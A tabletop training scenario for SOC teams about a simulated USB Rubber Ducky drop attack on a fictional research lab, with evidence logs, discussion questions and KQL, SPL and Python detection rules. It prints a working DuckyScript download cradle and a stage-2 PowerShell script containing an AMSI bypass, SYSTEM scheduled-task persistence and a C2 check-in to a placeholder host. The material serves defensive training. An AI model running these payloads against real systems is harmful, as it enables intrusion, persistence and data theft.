
SC-036: USB Drop Attack — Operation Iron Drop

Scenario Header

Type: Physical / Social Engineering  |  Difficulty: ★★★☆☆  |  Duration: 3–4 hours  |  Participants: 4–8

Threat Actor: IRON DROP — red team / physical penetration testing simulating insider and physical access threats

Primary ATT&CK Techniques: T1200 · T1091 · T1204 · T1059.001 · T1053.005 · T1562.001 · T1083 · T1041

Facilitator Note

This scenario simulates a USB drop attack against a research facility — weaponized USB drives planted in parking areas and common spaces to achieve initial access via human curiosity. Participants should include SOC analysts, endpoint security engineers, physical security officers, and HR/security awareness trainers. The scenario demonstrates the convergence of physical and cyber security and the effectiveness of social engineering via physical media. All data is synthetic. All organizations, IPs, and indicators are fictional.


Threat Actor Profile

IRON DROP represents a sophisticated red team engagement simulating a real-world adversary targeting intellectual property at a high-value research facility. The red team operates under rules of engagement that permit physical social engineering, USB-based payload delivery, and network-based post-exploitation. The simulated threat profile is a nation-state competitor seeking proprietary research data on quantum computing and advanced materials.

The red team's USB attack methodology uses commercially available Hak5 USB Rubber Ducky devices (keystroke-injection tools that enumerate as a USB keyboard) fitted into standard flash-drive casings, combined with custom PowerShell payloads. The devices are physically branded with the target organization's logo and labeled with enticing filenames to maximize insertion rates. Published drop studies report that roughly half of found USB drives are plugged in and opened; the red team's working assumption is that organizational branding pushes that rate higher.

Motivation: Espionage simulation — exfiltration of quantum computing research data, patent applications, and proprietary algorithms. The red team engagement was authorized by Quantum Research Labs' CISO to test physical security controls, endpoint protection, device control policies, and security awareness training effectiveness.


Scenario Narrative

Scenario Context

Quantum Research Labs is a private R&D facility with 480 employees, specializing in quantum computing hardware, quantum-resistant cryptography, and advanced materials research. The facility occupies a single campus with 3 buildings, a secured parking structure, and badge-controlled access at all entry points. The IT environment includes 620 endpoints (Windows 11 Enterprise), managed via Microsoft Intune, with CrowdStrike Falcon EDR deployed on all workstations. USB mass storage devices are restricted via Intune device configuration policy — however, USB HID (Human Interface Devices — keyboards, mice) are not blocked, as this would break legitimate peripherals. The security awareness program conducts annual phishing simulations but has never tested USB-based social engineering. Physical security includes 24/7 guard presence, CCTV in parking areas and lobbies, and badge access logging. The facility holds NIST 800-171 compliance for CUI protection.


Phase 1 — Physical Reconnaissance (~30 min)

IRON DROP conducts physical reconnaissance of Quantum Research Labs' campus over 5 days. The red team members pose as visitors, delivery personnel, and nearby business employees to observe physical security patterns, employee behavior, and campus layout.

Key observations:

  • Parking structure: 3 levels, badge-controlled vehicle entry, no guard at vehicle gate — pedestrian access unrestricted from adjacent public sidewalk
  • Employee behavior: Researchers frequently carry USB drives between labs — USB usage is culturally normalized
  • Smoking area: Outdoor area between Buildings A and B — no CCTV — employees leave badges visible on lanyards
  • Loading dock: Building C — delivery personnel not escorted — accessible from parking level 1
  • Badge design: Photographed from distance — blue badge with Quantum Research Labs logo, employee photo, first name

The red team also obtains Quantum Research Labs branded USB drives by ordering promotional items from the company's marketing vendor (publicly listed on the company's trade show registration page).

Evidence Artifacts:

Artifact: Detail
Physical Recon Log: 5 days of observation — Entry/exit patterns documented — Peak parking: 07:30–08:15, departure: 17:00–17:30 — CCTV coverage gaps identified: smoking area, parking level 3 rows G–J
CCTV Footage (post-incident): Parking level 2 — 2026-03-12T05:42:00Z — Individual in dark jacket placing objects near vehicles — Duration: 4 minutes — Face not captured (hooded, head down)
Badge Photo (attacker): Quantum Research Labs badge design captured — Blue card, logo upper-left, photo center, first name lower — Sufficient for visual cloning
USB Drive Order: Quantum Research Labs branded 32GB USB drives — Ordered from promo-vendor.example.com — Order #QRL-2026-0312 — 20 units — $180
Parking Access Log: No badge required for pedestrian access to parking structure — Vehicle gate requires badge but pedestrian entrance unlocked 24/7

Phase 1 — Discussion Inject

Technical: The red team obtained branded USB drives through the company's promotional vendor — a common OSINT finding. What controls would prevent this? Consider: vendor access controls for branded merchandise, restricting promotional item orders to authorized personnel, and monitoring for unauthorized orders of company-branded materials.

Decision: The parking structure allows unrestricted pedestrian access despite badge-controlled vehicle entry. Implementing pedestrian badge access would cost approximately $45,000 (turnstiles, readers, installation) and create friction for employees walking from nearby transit stops. Do you (A) implement full pedestrian access control, (B) add CCTV coverage to parking pedestrian entrances as a compensating control, or (C) accept the risk given that the parking structure contains only vehicles, not sensitive areas? Consider the USB drop attack vector.

Expected Analyst Actions:

  • [ ] Review CCTV footage from parking areas for suspicious activity during early morning hours
  • [ ] Audit pedestrian access controls to parking structure — identify gaps
  • [ ] Review promotional vendor access — determine if branded USB drives can be ordered externally
  • [ ] Assess USB device control policies — verify HID vs mass storage restrictions


Phase 2 — USB Preparation and Deployment (~40 min)

IRON DROP prepares 15 weaponized USB devices using Hak5 Rubber Ducky hardware inserted into the branded Quantum Research Labs USB drive casings. Each device is programmed with a DuckyScript payload that:

  1. Enumerates as a USB HID keyboard rather than mass storage, so the Intune mass storage policy never applies to it; the injected keystrokes run with the privileges of whoever is logged in, which is why the drives only work on an unlocked session
  2. Opens the Run dialog and launches a hidden PowerShell window with the execution policy bypassed
  3. Downloads a stage-2 script from 203.0.113.55 over HTTPS and runs it in memory
  4. Establishes a reverse shell to the C2 server at 203.0.113.55:443
  5. Creates persistence via a scheduled task named WindowsHealthCheck
  6. Removes any on-disk copy of the stage-2 script (the in-memory download cradle itself leaves no file behind)

Each USB drive is labeled with enticing content to encourage insertion:

Label | USB Count | Target Placement
"Q4 Salary Adjustments — CONFIDENTIAL" | 4 | Parking level 2 (near executive spaces)
"Project NOVA — Patent Draft v3" | 4 | Parking level 1 (near Building A — research labs)
"Security Camera Footage — DO NOT DISTRIBUTE" | 3 | Smoking area, lobby bench
"Quantum Research Labs — Employee Benefits 2026" | 4 | Cafeteria, break room, loading dock

The USB drives are deployed at 05:42 UTC on March 12, 2026 — before employees arrive. The red team member accesses the parking structure via the unrestricted pedestrian entrance, places drives near vehicle doors and walkways, and exits within 4 minutes.

Evidence Artifacts:

Artifact: Detail
DuckyScript Payload (stage 1, as programmed on each device):
    DELAY 2000
    GUI r
    DELAY 500
    STRING powershell -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://203.0.113.55/update.ps1')"
    ENTER
    DELAY 1000
Stage-2 Payload (update.ps1): PowerShell reverse shell → C2: 203.0.113.55:443 → Persistence: schtasks /create /tn "\Microsoft\Windows\Maintenance\WindowsHealthCheck" /tr "powershell -w hidden -ep bypass -c IEX(...)" /sc daily /st 08:00 /ru SYSTEM → Cleanup: removes any on-disk copy of update.ps1 (stage 1 runs it in memory via IEX, so on the three compromised hosts there was no file to remove)
C2 Infrastructure: Server: 203.0.113.55 — Domain: health-update.example.com — TLS cert: Let's Encrypt — Reverse proxy: Nginx — C2 framework: Sliver
USB Deployment Log (red team): 15 USB drives deployed — Parking L1: 4, Parking L2: 4, Smoking area: 2, Lobby: 1, Cafeteria: 3, Loading dock: 1 — Deployment time: 05:42–05:46 UTC
CCTV (Parking L2): Camera P2-C3 — 2026-03-12T05:42:14Z — Individual placing objects near vehicles in rows D–F — 4 minutes duration — Facial recognition: inconclusive (hood, low angle)

Phase 2 — Discussion Inject

Technical: The Rubber Ducky enumerates as a USB HID keyboard, not mass storage, so Intune's USB mass storage restriction never applies to it. What device control policies would block HID-based attacks? Consider: allowlisting USB devices by vendor ID/product ID (with the caveat that a keystroke injector can be configured to present any VID/PID, including that of an approved keyboard model), refusing enrollment of new HID devices while the screen is locked, requiring admin approval for new input devices, and endpoint detection of rapid keystroke injection (>500 WPM, far above any human typist). Note that Windows does not log keystroke rate natively, so the last option needs a keyboard-hook or filter-driver agent rather than a SIEM rule.

Decision: Security awareness training has never covered USB-based attacks. The red team estimates 45–60% of found drives will be inserted. Do you (A) implement an emergency USB awareness campaign before the red team engagement results are revealed (tipping off the test), (B) let the test run to establish a baseline insertion rate for future comparison, or (C) implement technical controls (HID blocking) immediately while allowing the awareness test to continue? What is the ethics of testing employees' security awareness without prior notification?

Expected Analyst Actions:

  • [ ] Review CCTV footage for USB deployment activity (early morning parking area activity)
  • [ ] Check device control policies — verify whether USB HID devices are restricted
  • [ ] Prepare for potential USB-based compromise — ensure EDR monitoring is active
  • [ ] Coordinate with physical security on parking area patrol frequency


Phase 3 — Payload Execution and Initial Compromise (~40 min)

By 10:30 UTC on March 12, three employees have found and inserted USB drives into their workstations. The Rubber Ducky payload executes in approximately 3 seconds — faster than most users can react to the rapidly appearing and disappearing PowerShell window.

Compromised Hosts:

Host | User | Label Found | Location | Time Inserted (Event 6416) | EDR Alert
WKST-RES-112 | mchen (Materials Researcher) | "Project NOVA — Patent Draft v3" | Parking L1 | 2026-03-12T08:14:20Z | Triggered — PowerShell download cradle
WKST-ENG-084 | asingh (Quantum Engineer) | "Q4 Salary Adjustments — CONFIDENTIAL" | Parking L2 | 2026-03-12T08:32:05Z | Triggered — Suspicious scheduled task
WKST-ADM-023 | bwilliams (Executive Assistant) | "Employee Benefits 2026" | Cafeteria | 2026-03-12T09:47:31Z | Not triggered — Payload variant with AMSI bypass

Evidence Artifacts:

Artifact: Detail
Windows Event ID 6416: New device: USB HID — Vendor: 0x05AC — Product: 0x024F — Device: HID Keyboard Device — Host: WKST-RES-112 — User: mchen — 2026-03-12T08:14:20Z (0x05AC is Apple's registered vendor ID: the injector presents itself as an Apple keyboard, so a VID-only allowlist that admits Apple peripherals would pass it)
Windows Event ID 6416: New device: USB HID — Host: WKST-ENG-084 — User: asingh — 2026-03-12T08:32:05Z
Windows Event ID 6416: New device: USB HID — Host: WKST-ADM-023 — User: bwilliams — 2026-03-12T09:47:31Z (6416 is emitted only when the "Audit PNP Activity" subcategory is enabled, which it was on these endpoints)
CrowdStrike Alert (High): Host: WKST-RES-112 — Detection: PowerShell Download Cradle — Process: powershell.exe -w hidden -ep bypass — Parent: explorer.exe — URL: https://203.0.113.55/update.ps1 — 2026-03-12T08:14:25Z
CrowdStrike Alert (Medium): Host: WKST-ENG-084 — Detection: Suspicious Scheduled Task Creation — Task: WindowsHealthCheck — 2026-03-12T08:32:12Z
Windows Event ID 4688: Process: powershell.exe — CommandLine: -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://203.0.113.55/update.ps1')" — Host: WKST-RES-112 — 2026-03-12T08:14:24Z (the command line appears in 4688 only when "Include command line in process creation events" is enabled)
DNS Log: WKST-RES-112 → health-update.example.com (resolves to 203.0.113.55) — 2026-03-12T08:14:24Z
Scheduled Task Created: Host: WKST-ENG-084 — Task: \Microsoft\Windows\Maintenance\WindowsHealthCheck — Action: powershell.exe -w hidden -ep bypass -c IEX(...) — Trigger: Daily 08:00 — RunAs: SYSTEM (a SYSTEM task can only be registered by a local administrator, so asingh holds admin rights on this workstation) — 2026-03-12T08:32:11Z

Stage-2 Payload (update.ps1) — Synthetic
# Quantum Research Labs Red Team — IRON DROP
# Stage 2 (abridged, synthetic): AMSI tamper + persistence + recon + C2 check-in.
# The interactive Sliver session is established separately and is not reproduced here.
$c2   = "203.0.113.55"
$port = 443

# AMSI bypass: the well-known amsiInitFailed reflection technique, shown here in
# its plain form. The variant that ran on WKST-ADM-023 obfuscated these strings,
# which is what defeated signature-based scanning. Script block logging
# (Event ID 4104) still records the script text, because it does not depend on AMSI.
$a = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$f = $a.GetField('amsiInitFailed','NonPublic,Static')
$f.SetValue($null,$true)

# Persistence via scheduled task. /ru SYSTEM succeeds only when the current user is
# a local administrator (true for asingh); for a standard user schtasks returns
# Access Denied, and a real payload falls back to a task that runs as that user.
schtasks /create /tn "\Microsoft\Windows\Maintenance\WindowsHealthCheck" `
    /tr "powershell -w hidden -ep bypass -c `"IEX(New-Object Net.WebClient).DownloadString('https://$c2/update.ps1')`"" `
    /sc daily /st 08:00 /ru SYSTEM /f

# System enumeration (Get-NetIPAddress returns one entry per interface; join them)
$info = @{
    hostname = $env:COMPUTERNAME
    user     = $env:USERNAME
    domain   = $env:USERDNSDOMAIN
    ip       = ((Get-NetIPAddress -AddressFamily IPv4).IPAddress -join ',')
    admin    = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

# Check in to C2 with the host profile (this POST is the first beacon; the bulk
# file exfiltration in Phase 4 goes over the Sliver session, not this call)
Invoke-RestMethod -Uri "https://${c2}:$port/api/checkin" -Method POST -ContentType 'application/json' -Body ($info | ConvertTo-Json)

# Cleanup. Stage 1 runs this script in memory via IEX, so $MyInvocation.MyCommand.Path
# is empty and nothing is on disk; the guard keeps Remove-Item from throwing. The line
# only matters for a variant that first drops the script to $env:TEMP.
if ($MyInvocation.MyCommand.Path) { Remove-Item $MyInvocation.MyCommand.Path -Force }

Phase 3 — Discussion Inject

Technical: CrowdStrike detected the payload on 2 of 3 compromised hosts. The third host (WKST-ADM-023) produced no EDR alert because the payload variant included an AMSI bypass. How would you detect the AMSI bypass technique? Consider: PowerShell script block logging (Event ID 4104), which records script text independently of AMSI, so strings such as AmsiUtils and amsiInitFailed (or the obfuscation that reconstructs them) remain visible there; process-creation logging (Event ID 4688 or Sysmon Event 1), which captured the stage-1 command line on every host regardless of what stage 2 did to AMSI, since AMSI inspects script content, not process command lines; and behavioral detection of a hidden-window PowerShell process spawned by explorer.exe that then opens an outbound TLS connection.

Decision: Three employees inserted found USB drives — a 20% insertion rate (3/15). Two were researchers and one was an executive assistant. Do you (A) immediately interview all three employees about their actions and awareness (potentially alerting others that a test is underway), (B) focus on technical containment first and conduct interviews later, or (C) use this as a teachable moment — brief the three employees, recruit them as "security champions," and use their experience in future awareness training?

Expected Analyst Actions:

  • [ ] Investigate CrowdStrike alerts for PowerShell download cradle and suspicious scheduled task
  • [ ] Correlate Event ID 6416 (USB device connection) across all endpoints — identify all insertions
  • [ ] Isolate compromised hosts: WKST-RES-112, WKST-ENG-084, WKST-ADM-023
  • [ ] Block C2 domain and IP: health-update.example.com / 203.0.113.55
  • [ ] Hunt for WindowsHealthCheck scheduled task across all endpoints
  • [ ] Collect remaining USB drives from campus before additional insertions


Phase 4 — Post-Exploitation and Data Exfiltration (~40 min)

From the undetected host WKST-ADM-023 (executive assistant bwilliams), IRON DROP operates under the assistant's own account; no privilege escalation is needed, because that account already has calendar access for 3 C-suite executives and read access to the \\FILE-RD\QuantumProjects shared drive containing research documentation.

The red team conducts internal reconnaissance, identifies high-value research data, and exfiltrates a curated dataset of 847 MB — quantum computing research papers, patent application drafts, and algorithm source code — via HTTPS to the C2 server during business hours.

Evidence Artifacts:

Artifact: Detail
SMB Access Log: Source: WKST-ADM-023 (10.10.3.23) — Share: \\FILE-RD\QuantumProjects — Account: bwilliams — Files accessed: 2,341 — Total size: 847 MB — 2026-03-12T11:14:00Z–14:22:00Z
Network (Zeek): 10.10.3.23 → 203.0.113.55:443 — HTTPS — 847 MB outbound over 3 hours — 1,247 sessions — Average payload: 679 KB — 2026-03-12T11:30:00Z–14:30:00Z
File Access Audit: \\FILE-RD\QuantumProjects\NOVA\patent-draft-quantum-error-correction-v7.docx — Accessed by: bwilliams — 2026-03-12T11:14:22Z — Note: bwilliams has never accessed this file before
File Access Audit: \\FILE-RD\QuantumProjects\ATLAS\algorithm-qec-stabilizer.py — Accessed by: bwilliams — 2026-03-12T11:42:08Z — First access
PowerShell Event 4104: Script block: Get-ChildItem -Path "\\FILE-RD\QuantumProjects" -Recurse -Include *.docx,*.pdf,*.py,*.ipynb | Select Name,Length,LastWriteTime | Export-Csv C:\Users\bwilliams\AppData\Local\Temp\inventory.csv — Host: WKST-ADM-023 — 2026-03-12T11:08:33Z
DLP Alert: Endpoint DLP: WKST-ADM-023 — 847 MB uploaded to external HTTPS destination — Classification: Not configured for research data — Alert: Volume-based only (>500 MB) — 2026-03-12T14:30:00Z

KQL — USB HID Device Connection Anomaly
// Approved keyboard/mouse VID/PID pairs. Example entries; in practice fill this from
// an inventory export. A keystroke injector configured to present an approved pair
// passes this check, so pair it with the timing rule that follows.
let ApprovedHid = datatable(VendorId:string, ProductId:string) [
    "046D", "C31C",   // example: Logitech keyboard
    "045E", "0750"    // example: Microsoft keyboard
];
DeviceEvents
| where ActionType == "PnpDeviceConnected"
// DeviceDescription, ClassName and the PnP instance path live inside AdditionalFields
| extend p = parse_json(AdditionalFields)
| extend ClassName = tostring(p.ClassName), DeviceDescription = tostring(p.DeviceDescription), PnpDeviceId = tostring(p.DeviceId)
| where ClassName =~ "HIDClass" or DeviceDescription has_any ("Keyboard", "HID")
| extend VendorId = toupper(extract(@"VID_([0-9A-Fa-f]{4})", 1, PnpDeviceId)),
         ProductId = toupper(extract(@"PID_([0-9A-Fa-f]{4})", 1, PnpDeviceId))
| join kind=leftanti ApprovedHid on VendorId, ProductId
| project Timestamp, DeviceName, AccountName, DeviceDescription, VendorId, ProductId, PnpDeviceId
KQL — Shell Spawned Within Seconds of a HID Connection
// HID connections per machine; DeviceId here is the Defender machine id used for the join
let Hid = DeviceEvents
| where ActionType == "PnpDeviceConnected"
| extend p = parse_json(AdditionalFields)
| where tostring(p.ClassName) =~ "HIDClass"
| project DeviceId, HidDeviceId = tostring(p.DeviceId), ConnectTime = Timestamp;
DeviceProcessEvents
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
// GUI r opens the Run dialog, so the injected shell has explorer.exe as its parent
| where InitiatingProcessFileName =~ "explorer.exe"
| join kind=inner Hid on DeviceId
| where Timestamp between (ConnectTime .. (ConnectTime + 10s))
| extend SecondsAfterConnect = datetime_diff("second", Timestamp, ConnectTime)
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, HidDeviceId, SecondsAfterConnect
SPL — USB HID Device Connection Anomaly (field names as extracted by the Splunk Add-on for Microsoft Windows; approved_hid_devices.csv is a lookup with columns VendorId, ProductId, approved)
index=wineventlog EventCode=6416 Class_Name="HIDClass"
| rex field=Device_ID "VID_(?<VendorId>[0-9A-Fa-f]{4})&PID_(?<ProductId>[0-9A-Fa-f]{4})"
| eval VendorId=upper(VendorId), ProductId=upper(ProductId)
| lookup approved_hid_devices.csv VendorId, ProductId OUTPUT approved
| where isnull(approved)
| table _time, host, user, Device_Name, Class_Name, VendorId, ProductId, Device_ID
| sort - _time
SPL — PowerShell Download Cradle After USB Connection (Process_Command_Line is populated only when command-line auditing is enabled for 4688)
index=wineventlog (EventCode=6416 Class_Name="HIDClass") OR (EventCode=4688 New_Process_Name="*powershell.exe" (Process_Command_Line="*DownloadString*" OR Process_Command_Line="*IEX*" OR Process_Command_Line="*Net.WebClient*"))
| eval usb_time=if(EventCode=6416, _time, null())
| sort 0 host, _time
| streamstats current=t last(usb_time) as last_usb_time by host
| where EventCode=4688 AND isnotnull(last_usb_time) AND (_time - last_usb_time) < 30
| eval seconds_after_usb=_time - last_usb_time
| table _time, host, user, Process_Command_Line, seconds_after_usb
SPL — Large Outbound HTTPS Transfer Detection
index=network sourcetype=firewall dest_port=443 action=allowed
| stats sum(bytes_out) as total_bytes dc(session_id) as sessions by src_ip, dest_ip
| where total_bytes > 500000000
| eval total_MB=round(total_bytes/1048576,2)
| table src_ip, dest_ip, total_MB, sessions
| sort - total_MB
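The KQL and SPL above express three of this phase's detection points as SIEM queries: an unknown HID VID/PID, a shell spawned within seconds of a HID connection, and the download cradle. The Python below is an added example, not from the page or any vendor, that runs the same logic offline over a constructed pipe-delimited export of Windows events 6416, 4688 and 4104, and adds the AMSI-tamper string check from the Phase 3 inject (which works because script block logging records script text independently of AMSI). The export format, the field names, the approved VID/PID list and the sample events are all assumptions constructed for the example.

```python
"""Correlation rules for a HID drop attack over constructed Windows events.
Added example for this scenario, not the page's own KQL/SPL; the export
format, field names and approved VID/PID list below are assumptions."""
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Approved keyboard/mouse (VID, PID) pairs. Assumed inventory. An injector
# configured to present an approved pair passes this check, so the timing rule
# below is the one that survives VID/PID spoofing.
APPROVED_HID = {("046D", "C31C"), ("045E", "0750")}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
CRADLE = re.compile(r"IEX|Invoke-Expression|DownloadString|Net\.WebClient", re.I)
# Strings from the amsiInitFailed reflection bypass family; 4104 script block
# logging records them even after AMSI itself has been disabled.
AMSI_TAMPER = re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I)
VID_PID = re.compile(r"VID_([0-9A-Fa-f]{4})&PID_([0-9A-Fa-f]{4})")


@dataclass
class Event:
    ts: datetime
    host: str
    user: str
    event_id: int
    data: dict = field(default_factory=dict)


def parse_line(line):
    """Constructed export format: ts|host|user|event_id|key=value;key=value"""
    ts, host, user, eid, rest = line.split("|", 4)
    data = dict(kv.split("=", 1) for kv in rest.split(";") if kv)
    return Event(datetime.fromisoformat(ts.replace("Z", "+00:00")), host, user, int(eid), data)


def vid_pid(device_id):
    """Pull (VID, PID) out of a PnP instance path such as USB\\VID_05AC&PID_024F\\..."""
    m = VID_PID.search(device_id)
    return (m.group(1).upper(), m.group(2).upper()) if m else None


def detect(lines, window=timedelta(seconds=10)):
    """Return (rule, host, user, detail) tuples in time order."""
    events = sorted((parse_line(l) for l in lines), key=lambda e: e.ts)
    alerts, last_hid = [], {}          # last_hid: host -> time of newest HID connect
    for e in events:
        if e.event_id == 6416 and e.data.get("ClassName") == "HIDClass":
            last_hid[e.host] = e.ts
            ids = vid_pid(e.data.get("DeviceId", ""))
            if ids not in APPROVED_HID:
                alerts.append(("unknown_hid", e.host, e.user, ids))
        elif e.event_id == 4688:
            exe = e.data.get("NewProcessName", "").rsplit("\\", 1)[-1].lower()
            cmd = e.data.get("CommandLine", "")
            hid_ts = last_hid.get(e.host)
            # A shell seconds after a new keyboard appeared is the injection signature
            if exe in SHELLS and hid_ts is not None and e.ts - hid_ts <= window:
                alerts.append(("shell_after_hid", e.host, e.user, (e.ts - hid_ts).total_seconds()))
            if CRADLE.search(cmd):
                alerts.append(("download_cradle", e.host, e.user, cmd[:40]))
        elif e.event_id == 4104 and AMSI_TAMPER.search(e.data.get("ScriptBlockText", "")):
            alerts.append(("amsi_tamper", e.host, e.user, None))
    return alerts


# Constructed sample: events from two compromised hosts (VID 05AC is Apple's
# vendor ID, which the injector is impersonating) plus a benign approved keyboard.
SAMPLE = [
    "2026-03-12T08:14:20Z|WKST-RES-112|mchen|6416|ClassName=HIDClass;DeviceId=USB\\VID_05AC&PID_024F\\6&1a2b3c",
    "2026-03-12T08:14:24Z|WKST-RES-112|mchen|4688|NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe;CommandLine=powershell -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('https://203.0.113.55/update.ps1')",
    "2026-03-12T09:47:31Z|WKST-ADM-023|bwilliams|6416|ClassName=HIDClass;DeviceId=USB\\VID_05AC&PID_024F\\6&9f8e7d",
    "2026-03-12T09:47:35Z|WKST-ADM-023|bwilliams|4104|ScriptBlockText=$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')",
    "2026-03-12T10:02:00Z|WKST-HR-007|jdoe|6416|ClassName=HIDClass;DeviceId=USB\\VID_046D&PID_C31C\\7&0c0d0e",
    "2026-03-12T10:02:03Z|WKST-HR-007|jdoe|4688|NewProcessName=C:\\Windows\\explorer.exe;CommandLine=explorer.exe",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

Against the sample, the unknown-VID rule fires on both injector hosts, the timing rule and the cradle rule fire on WKST-RES-112, the AMSI rule fires on WKST-ADM-023 from the script block alone, and the approved Logitech keyboard on WKST-HR-007 produces nothing. If the device were reflashed to present 046D:C31C, only the timing and content rules would remain, which is the argument for not relying on the allowlist alone.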

Phase 4 — Discussion Inject

Technical: The executive assistant bwilliams has read access to \\FILE-RD\QuantumProjects — but has never accessed research files before. This access pattern anomaly is a strong UEBA signal. What baseline behavioral analytics would detect this? Consider: first-access file share monitoring, volume-based DLP, time-of-day access patterns, and file type access profiling.

Decision: The red team has exfiltrated 847 MB of research data including patent drafts and algorithm source code. Under the rules of engagement, the red team is authorized to exfiltrate data to demonstrate impact. However, the undetected compromise on WKST-ADM-023 has been active for 6 hours. At what point should the red team self-report to prevent actual harm, even if the rules of engagement allow continued operation? What ethical boundaries govern red team engagements?

Expected Analyst Actions:

  • [ ] Investigate DLP alert for 847 MB HTTPS upload from WKST-ADM-023
  • [ ] Correlate file access anomaly — bwilliams accessing research files for the first time
  • [ ] Review PowerShell script block logs for file enumeration activity
  • [ ] Isolate WKST-ADM-023 and preserve forensic image
  • [ ] Audit bwilliams account permissions — assess least privilege compliance
  • [ ] Conduct physical sweep of campus for remaining USB drives
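The Phase 4 inject asks what baseline analytics would have flagged bwilliams's first visit to \\FILE-RD\QuantumProjects and the 847 MB upload. The Python below is an added example (not from the page or any UEBA product) of the two simplest such baselines: a per-user set of previously used shares built from historical file-access records, with alerts on first access to a sensitive share and on bulk reads from a never-used share, and a sliding-window byte sum per source/destination pair that fires when egress to an unapproved destination crosses 500 MB. The record formats, the sensitive-share list, the approved-destination list and the thresholds are assumptions; the sample records are constructed to mirror the scenario's numbers (1,247 sessions averaging 679 KB).

```python
"""First-access and volume baselines over constructed audit records.
Added example for this scenario, not the page's own UEBA; record formats,
the sensitive-share list, approved destinations and thresholds are assumed."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

SENSITIVE_SHARES = {r"\\FILE-RD\QuantumProjects"}   # assumed classification
BULK_READ_FILES = 50        # files read from a never-used share in one window
VOLUME_BYTES = 500_000_000  # mirrors the scenario's 500 MB volume-only DLP rule


def share_of(path):
    r"""\\server\share\dir\file -> \\server\share"""
    parts = path.split("\\")
    if path.startswith("\\\\") and len(parts) > 3:
        return "\\\\" + parts[2] + "\\" + parts[3]
    return path


def build_baseline(history):
    """history: (user, path) pairs from a prior period -> {user: {shares used}}.
    The baseline is what a user actually touched, not what the ACLs permit; that
    gap is exactly what bwilliams's unused read access illustrates."""
    base = defaultdict(set)
    for user, path in history:
        base[user].add(share_of(path))
    return base


def score_file_access(baseline, records):
    """records: (ts, user, path, size_bytes). Returns (rule, user, share, files)."""
    counts = defaultdict(lambda: defaultdict(int))      # user -> share -> files read
    for _ts, user, path, _size in records:
        counts[user][share_of(path)] += 1
    alerts = []
    for user, shares in counts.items():
        for share, n in shares.items():
            if share in baseline.get(user, set()):
                continue                                  # seen before: no signal
            if share in SENSITIVE_SHARES:
                alerts.append(("first_access_sensitive_share", user, share, n))
            if n >= BULK_READ_FILES:
                alerts.append(("bulk_read_new_share", user, share, n))
    return alerts


def score_egress(flows, window=timedelta(hours=4), known_dests=frozenset()):
    """flows: (ts, src, dst, bytes_out). Fires once per (src, dst) when the
    sliding-window sum to an unapproved destination first exceeds VOLUME_BYTES."""
    buf, fired, alerts = defaultdict(deque), set(), []
    for ts, src, dst, out in sorted(flows):
        if dst in known_dests or (src, dst) in fired:
            continue
        q = buf[(src, dst)]
        q.append((ts, out))
        while ts - q[0][0] > window:                     # drop sessions outside the window
            q.popleft()
        total = sum(b for _, b in q)
        if total > VOLUME_BYTES:
            fired.add((src, dst))
            alerts.append(("volume_egress", src, dst, round(total / 1_000_000)))
    return alerts


# Constructed samples mirroring the scenario.
HISTORY = [("bwilliams", r"\\FILE-EXEC\Calendar\ceo.ics"),
           ("bwilliams", r"\\FILE-HR\Policies\handbook.pdf"),
           ("mchen", r"\\FILE-RD\QuantumProjects\ATLAS\algorithm-qec-stabilizer.py")]
T0 = datetime(2026, 3, 12, 11, 14, 22)
ACCESS_RECORDS = [(T0 + timedelta(seconds=5 * i), "bwilliams",
                   rf"\\FILE-RD\QuantumProjects\NOVA\draft-{i}.docx", 350_000) for i in range(60)]
ACCESS_RECORDS += [(T0, "bwilliams", r"\\FILE-EXEC\Calendar\cfo.ics", 4_000),
                   (T0, "mchen", r"\\FILE-RD\QuantumProjects\NOVA\notes.docx", 20_000)]
FLOWS = [(datetime(2026, 3, 12, 11, 30) + timedelta(seconds=8 * i),
          "10.10.3.23", "203.0.113.55", 679_000) for i in range(1247)]
FLOWS += [(datetime(2026, 3, 12, 12, 0), "10.10.3.23", "198.51.100.10", 900_000_000)]
KNOWN_DESTS = frozenset({"198.51.100.10"})   # assumed approved backup destination

if __name__ == "__main__":
    for a in score_file_access(build_baseline(HISTORY), ACCESS_RECORDS):
        print(a)
    for a in score_egress(FLOWS, known_dests=KNOWN_DESTS):
        print(a)
```

On the sample, bwilliams trips both file-access rules on the first pass (mchen, whose baseline already includes the share, trips neither), and the egress rule fires on the 737th session to 203.0.113.55, at the 500 MB crossing, while the larger transfer to the approved destination is ignored. The volume rule confirms the scenario's point: it fires, but only after most of the data has already left, whereas the first-access rule would have fired on the first file read at 11:14.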


Detection & Response

Key Detection Opportunities

Detection Point | Event / Data Source | Query Logic
USB HID device connection | Event ID 6416 (requires the Audit PNP Activity subcategory) / Defender for Endpoint DeviceEvents | New HIDClass device whose VID/PID is not on the peripheral allowlist
Rapid keystroke injection | Process creation logs (4688, Sysmon 1, DeviceProcessEvents) | Shell process with explorer.exe as parent within ~10 s of a HID device connection
PowerShell download cradle | EDR / Event ID 4688 command line / Event ID 4104 script block | IEX, DownloadString, Net.WebClient patterns
Suspicious scheduled task | Event ID 4698 / EDR | Task whose action is PowerShell with a hidden window and execution-policy bypass
File access anomaly | File audit (Event ID 4663) / UEBA | First-time access to sensitive file shares; bulk reads from a share the user has never used
Volume-based exfiltration | DLP / Network monitoring | >500 MB HTTPS upload to uncategorized destination

Immediate Containment (0–4 hours)

  • [ ] Isolate all three compromised hosts from the network
  • [ ] Block C2 IP 203.0.113.55 and domain health-update.example.com at firewall and DNS
  • [ ] Remove scheduled task WindowsHealthCheck from all affected hosts
